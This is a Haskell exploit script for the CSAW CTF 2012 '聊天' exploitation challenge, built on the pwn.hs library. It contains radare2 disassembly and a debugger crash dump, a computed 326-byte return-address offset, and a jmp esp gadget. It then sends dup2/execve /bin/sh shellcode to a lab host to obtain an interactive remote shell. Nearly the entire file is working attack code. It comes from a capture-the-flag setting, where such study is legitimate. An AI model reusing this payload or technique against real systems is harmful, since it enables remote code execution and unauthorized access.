{-# LANGUAGE OverloadedStrings #-}
-- CSAW CTF Qualification Round 2012: 聊天
-- http://shell-storm.org/repo/CTF/CSAW-2012/Exploitation/300/
import Control.Monad
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Numeric (showHex)
-- https://github.com/Tosainu/pwn.hs/tree/bee9e20
import Pwn
-- | pwn.hs settings for the target: a 32-bit x86 binary (the disassembly
-- notes in 'main' show fixed 0x0804xxxx text addresses). Handed to
-- 'pwnWith' at the top of 'main'.
cfg = defaultConfig
  { bits = 32
  , arch = "i386"
  }
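-- | Exploit driver for the CSAW 2012 "聊天" service.
--
-- @sub.read_86e@ reserves a 0x15c-byte frame, places its buffer at
-- @esp+0x16@ and then @read()@s up to 0x800 bytes into it (see the radare2
-- listing below), so 0x15c - 0x16 = 326 bytes of input reach the saved
-- return address. The payload overwrites it with the address of a
-- @jmp esp@ gadget; after @ret@, @esp@ points at the bytes that follow the
-- return address, which is where the shellcode is placed.
--
-- Assumptions baked into the payload — confirm against the target (e.g.
-- checksec) before relying on it:
--
--   * the binary is loaded at a fixed address (non-PIE), so the gadget at
--     0x08048f47 does not move;
--   * the shellcode runs from the stack buffer, so NX must be off;
--   * the client socket is fd 4 in the process handling the connection
--     (hard-coded in the dup2 loop);
--   * the target is the lab host 192.168.122.10:4842.
main :: IO ()
main = pwnWith cfg $ do
  r <- remote "192.168.122.10" 4842
  -- Discard the greeting line before sending the payload.
  recvline r

  -- [0x080488b0]> pdf @ sub.read_86e
  -- ╭ (fcn) sub.read_86e 42
  -- │ sub.read_86e ();
  -- │ ; var int local_4h @ esp+0x4
  -- │ ; var int local_8h @ esp+0x8
  -- │ ; var int local_16h @ esp+0x16
  -- │ ; UNKNOWN XREF from 0x080487d5 (fcn.080487d5)
  -- │ ; CALL XREF from 0x080488a7 (sub._898)
  -- │ 0x0804886e 81ec5c010000 sub esp, 0x15c
  -- │ 0x08048874 a178b00408 mov eax, dword [obj.sockfd] ; [0x804b078:4]=0
  -- │ 0x08048879 c74424080008. mov dword [esp + local_8h], 0x800 ; [0x800:4]=-1 ; 2048
  -- │ 0x08048881 8d542416 lea edx, dword [esp + local_16h] ; 0x16 ; 22
  -- │ 0x08048885 89542404 mov dword [esp + local_4h], edx
  -- │ 0x08048889 890424 mov dword [esp], eax
  -- │ 0x0804888c e86ffdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
  -- │ 0x08048891 81c45c010000 add esp, 0x15c
  -- ╰ 0x08048897 c3 ret
  --
  -- Crash with a cyclic pattern as input:
  -- gef➤ reg
  -- $eax : 0x00000800
  -- $ebx : 0x000004a2
  -- $ecx : 0xffffc546 → "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQA[...]"
  -- $edx : 0x00000800
  -- $esp : 0xffffc690 → "xAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEA[...]"
  -- $ebp : 0xffffd528 → 0x00000000
  -- $esi : 0xf7fc6000 → 0x001b1db0
  -- $edi : 0x08048e49 → call 0x96eb2d0d
  -- $eip : 0x42417742 ("BwAB"?)
  -- gef➤ !ragg2 -q 0x42417742
  -- Little endian: 326
  -- Big endian: -1

  -- Shellcode: redirect the socket onto stdin/stdout/stderr, then execve a
  -- shell. edx is kept at zero throughout and used both as the NULL for
  -- execve's argv terminator/envp and as the base for "lea eax, [edx+N]",
  -- which sets the syscall number without emitting NUL bytes.
  eshellcode <- asm $ BS.intercalate "\n"
    [ "xor edx, edx"
    , "/* dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); */"
    , "lea ebx, [edx+4]"      -- ebx = 4: the client socket fd (assumed)
    , "mov ecx, edx"          -- ecx = 0: first target fd
    , "loop:"
    , "lea eax, [edx+0x3f]"   -- eax = 63 = sys_dup2 on i386; reloaded each pass since int 0x80 clobbers eax
    , "int 0x80"
    , "inc ecx"
    , "cmp cl, 0x3"           -- stop after fds 0, 1 and 2
    , "jne loop"
    , "/* execve(\"/bin/sh, [\"/bin/sh\"], 0); */"
    , "push edx"              -- NUL terminator for the path string
    , "push 0x68732f2f"       -- "//sh"
    , "push 0x6e69622f"       -- "/bin"  -> ebx = "/bin//sh"
    , "mov ebx, esp"
    , "push edx"              -- argv[1] = NULL
    , "push ebx"              -- argv[0] = "/bin//sh"
    , "mov ecx, esp"          -- ecx = argv; edx = envp = NULL
    , "lea eax, [edx+11]"     -- eax = 11 = sys_execve on i386
    , "int 0x80"
    , "lea eax, [edx+1]"      -- eax = 1 = sys_exit, reached only if execve fails
    , "int 0x80"
    ]
  -- Abort on an assembler error rather than proceeding with no shellcode.
  shellcode <- either error pure eshellcode

  let eipOffset = 326          -- bytes from the buffer start to the saved EIP (ragg2 result above)
      readSize  = 0x800        -- nbyte passed to read() in sub.read_86e; anything beyond it never arrives
      jmp_esp   = 0x08048f47   -- 0x08048f47: jmp esp ; (2 found)
      -- p32 returns Nothing when the value cannot be packed. Fail loudly
      -- here: silently dropping the return address (as catMaybes would)
      -- produces a payload that merely crashes the target.
      retAddr   = fromMaybe (error "p32: could not pack jmp_esp") (p32 jmp_esp)
      buf       = BS.concat [BS.replicate eipOffset 'a', retAddr, shellcode]
  -- Everything past read()'s nbyte is left in the socket and never executed.
  when (BS.length buf > readSize) $
    error "payload is larger than the 0x800 bytes sub.read_86e reads"
  sendline r buf
  interactive r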